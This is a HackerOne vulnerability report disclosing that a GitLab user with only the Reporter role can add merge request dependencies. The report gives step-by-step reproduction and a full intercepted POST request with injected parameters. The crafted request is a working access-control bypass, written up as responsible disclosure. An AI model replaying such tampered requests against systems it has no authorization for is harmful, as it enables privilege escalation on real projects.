Reporter Able to Edit Merge Requests Dependencies
HackerOne report #743339 by rafiem
on 2019-11-21, assigned to @jeremymatos:
Hi Team,
I have found improper access control on gitlab merge request system. There is a new feature in merge requests, which is merge request dependencies. This settings make the MR that being edited, cannot be merged unless the dependencies MR already merged. Even if i dont find spesific rule permission of the merge request dependencies, i am sure that this settings can only be edited by at least user with Developer rule (Same as editing assigned user, label). In this case, user with Reporter role are able to change and edit the merge request dependencies.
Proof of Concept
1.) User A have public or private project ( In this report i use : https://gitlab.com/bambangyera/mokil)
2.) User A add some branch to it
3.) User A then create random MR
4.) User A invite User B as Reporter to the project
5.) User B then create MR from the branch
6.) User B then try to edit the MR that he/she created (In this report i use : bambangyera/mokil!4)
7.) As we can see, there is no option for editing the MR dependencies
8.) User B then turn on burp suite and then intercept the request for editing the MR
9.) In the body part of the POST request, add parameter merge_request%5Bblocking_merge_request_references%5D%5B%5D
with value url that contain MR dependencies and parameter merge_request%5Bupdate_blocking_merge_request_refs%5D
with value true
:
POST /bambangyera/mokil/merge_requests/4 HTTP/1.1
Host: gitlab.com
Connection: close
Content-Length: 362
Cache-Control: max-age=0
Origin: https://gitlab.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: https://gitlab.com/bambangyera/mokil/merge_requests/4/edit
Accept-Encoding: gzip, deflate
Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: <REDACTED>
utf8=%E2%9C%93&_method=patch&authenticity_token=REDACTED2%3D%3D&merge_request%5Btarget_branch%5D=test&merge_request%5Btitle%5D=POC&merge_request%5Bdescription%5D=aaaaaaa&merge_request%5Bapprovals_before_merge%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=4&merge_request%5Bblocking_merge_request_references%5D%5B%5D=https%3A%2F%2Fgitlab.com%2Fbambangyera%2Fmokil%2Fmerge_requests%2F1&merge_request%5Bupdate_blocking_merge_request_refs%5D=true
- Forward the request
- As result, MR dependencies added to the MR that being edited, even if the user (reporter role) dont have or see the option when editing the MR
<>PoC video attached
PoC.webm
Impact
User with role reporter able to edit MR dependencies
Best Regards,
[@]rafiem
Attachments
Warning: Attachments received through HackerOne, please exercise caution!